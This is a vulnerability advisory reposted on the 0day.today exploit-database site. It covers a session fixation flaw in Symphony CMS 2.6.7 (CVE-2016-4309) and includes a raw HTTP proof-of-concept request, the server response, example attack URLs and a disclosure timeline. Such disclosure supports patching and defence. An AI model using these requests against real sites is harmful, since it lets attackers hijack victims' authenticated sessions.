0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Symphony CMS 2.6.7 - Session Fixation
Author
Risk
[
Security Risk Medium
]0day-ID
Category
Date add
CVE
Platform
[+] Credits: John Page aka hyp3rlinx [+] ISR: APPARITIONSEC Vendor: ==================== www.getsymphony.com Product: ================== Symphony CMS v2.6.7 Download: http://www.getsymphony.com/download/ Symphony is a XSLT-powered open source content management system. Vulnerability Type: =================== Session Fixation CVE Reference: ============== CVE-2016-4309 Vulnerability Details: ===================== Symphony CMS is prone to "Session Fixation" allowing attackers to preset a users PHPSESSID "Session Identifier". If the application is deployed using an insecure setup with PHP.INI "session.use_only_cookies" not enabled, attackers can then send victims a link to the vulnerable application with the "PHPSESSID" already initialized as Symphony does not use or call "session_regenerate_id()" upon successful user authentication. Note: as per php.net/manual/en/session.configuration.php "session.use_only_cookies=1" is default since PHP 4.3.0. e.g. "http://localhost/symphony/?PHPSESSID=APPARITION666". As Symphonys Session ID is not regenerated it can result in arbitrary Session ID being 'Fixated' to a user, if that user authenticates using this attacker supplied session fixated link, the attacker can now access the affected application from a different Computer/Browser and have the same level of access to that of the victim. Default Cookie lifetime for Symphony CMS is up to two weeks. Reproduction steps: ===================== Edit PHP.INI and change following settings to 'session.use_only_cookies=0' if applicable, as POC test. 1) Telnet localhost 80 2) make HTTP request with a prefixed PHPSESSID GET /symphony-2.6.7/symphony/?PHPSESSID=PWN3D666 HTTP/1.1 Host: localhost Connection: close 3) Hit enter twice HTTP/1.1 200 OK Date: Mon, 16 May 2016 02:06:47 GMT Server: Apache/2.4.12 (Win32) OpenSSL/1.0.1l PHP/5.6.8 X-Powered-By: PHP/5.6.8 Set-Cookie: PHPSESSID=PWNED666; expires=Mon, 30-May-2016 02:06:48 GMT; Max-Age=1209600; path=/symphony-2.6.7; httponly Content-Length: 1501 Connection: close Content-Type: text/html; charset=UTF-8 Exploit code(s): =============== 1) http://localhost/symphony-2.6.7/symphony/publish/articles/?PHPSESSID=hyp3rlinx 2) http://localhost/symphony-2.6.7/symphony/?PHPSESSID=APPARITION Disclosure Timeline: ===================================== Vendor Notification: May 3, 2016 Vendor Release Fix: May 23, 2016 June 20, 2016 : Public Disclosure. Exploitation Method: ==================== Remote Severity Level: ================ 6.8 (Medium) CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N Description: ============================================== Request Method(s): [+] GET / POST Vulnerable Product: [+] Symphony CMS 2.6.7 Vulnerable Parameter(s): [+] 'PHPSESSID' # 0day.today [2024-09-28] #